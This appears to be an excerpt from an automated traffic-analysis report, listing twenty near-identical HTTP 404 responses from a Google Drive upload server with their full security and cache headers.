                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC71axouczu4WbTM8pSXSbChLXFs0qsoHGxdNBhEU5_XAmI74RgIt3pO4sGDcc06-5A7Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:56 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-uNq4dszDdvHq_rjV9HIO4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC46ZI_PekB0sAhzBemEWI8MxNhagSFHMiAX2S0AzZaspS7AmbeTGb0bHFY2ACWrd3KdIuFvz4EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:56 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-6i__vCGVRhyTdhiVe6XEhQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4QGxGLAgteUquziWnVswHBg5rOhTg5B-r6i9NcOip_adMqZ-MWqs8zKLDcS1K449OrContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:58 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-9RD-z3i68lejJdlpMmaFTg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC59S1EIAYqWqKN-RL9cBEFjLtG6mGfMsfQG-9Y85kFuPfTMajTgYDTPhxcuh6jifghSnHvQ_-sContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:58 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-aO-F4N-SLdjS6NQ9pXnAXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5OqnaIt447Nwk8v-6N1_nA0xu7WLYV7AxU9Mw8mqtu0RF-pUgfN0TmIUZwhhFnQNs9Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:59 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-j9kWynQ2lZylgIo9_aWemQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7-ca-Ipel5fRsn8_R10BVxAzRjgKwTnHnRfJGY2M8RYIBKYSnzbvXVWfDszD9dbQPklx8OW-4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:51:59 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-x6NrhEpu7vwikL1jF-Vzgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6s0DPqGYYLfhlaEAT8g46o-ov3BA1vvIYzxwFXfekHAQkArvTHx4IYQTmw67Zy0SBPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:00 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-jnJnlOxdgDVPHxvNCaCxyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5UhNSDuX1yXEPB2Y1vJDTgDId2tCSvXesF0IKwfgd9meoe7Kkojsv2HYVHnZ7p3RxWB5EsBTMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:00 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-1UZgnY1lPp7Gm32Gxp9NCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7o8Gv7W5vY-DXGSko3N5l45cDkgmncZF_iXx4aAFW_i9skmV2YjZsdwNJf1AeyF91-Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:03 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-8A18mdk84OEKuKkxgfT4Uw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7ehbSz27ueUWw1jhTJ0uODpHQe2tFBghLdcJQxPtUs4awq3-gSJU_C_iemQR5NreNrContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:03 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-doczwvqjkEEIj7b_bgHGQw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC66CP1O1x3bxiR5Nia8n1QJUBThuwpJfJcUuHqZhx45E7UEbHhTFD8cspGJIA8ahVdvContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:04 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Cl31Zh5YRl7eYY4elcSwlg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4ZUzqQhteTDOn3DtVO3XS61my8wMcWSHlFGEc_Fyl3CRBrq0YeywCBa2j3E1BWYUg4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:04 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-NLS6wCTfRLBf1OJla2rm3Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4DNhYLOqfTGW9Kacypbi9PPJXyMMVeAbTU7Qb97Nlox2W0BMIZ1vK8PGhQrBIlc9FTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:05 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-FCn_zLPgjEfZCbzA57NmDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5rMlgzdJF1f9HVlW8qpu5btQIYV2VULl9EWNcD5CZoHP2ca-9PeyN0XFUIq8xw6DrWContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:05 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-_dC7TnPJZG87Qc6QhYaipg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5Qo9c_vMef2jjKXOqcAL0HOlUhgqZInvgijnHetd5OvG8EVNHrAzJobec0Dsse947zContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:08 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-flNP4RIhSWrxSlct6vMqeA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7D7c9OXmTzIZWKrx5vybKNz0GilhjhEil1qCH9y9FtksUxsgXSrqYIata-_LCXsTSEDw57AFgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:08 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-FHGTyycEjDHej5ucwjBPjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Cross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5_Xk7OBajP2oyQyGWSSrcnmORJ9yWQ6PIJRtMYc2Rc23tmSKaz224N_XsHtcMymy-nyDdCTdsContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:09 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-FfNn8Mw6_hIJlMpBf2eWwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5w98vN_oUKKGUsqIppkXiyQkPbFyCLNb8jeum6dEbb6_Toy-3CN6m8kK3HjWEQ-qo2Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:09 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-ncrFxwgbVkXAJvKWc78FEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7uIISrm11Y8NJxpqqeVjZmZLhfFExp8-_DopIGCkxBc8V0RlmtFK2yu9WQeHcEoTBedR-Jkg4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:10 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-4BOFQh6NNkEXaDrYy1_Row' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4ewuQOrPtWoZFptIs4I1vK1bifW7RwEAmjD61ca8ng0WUxJIw-eW-j4TGBp1nUwOkMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:10 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-v731m41pq_vICxhWcPODKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
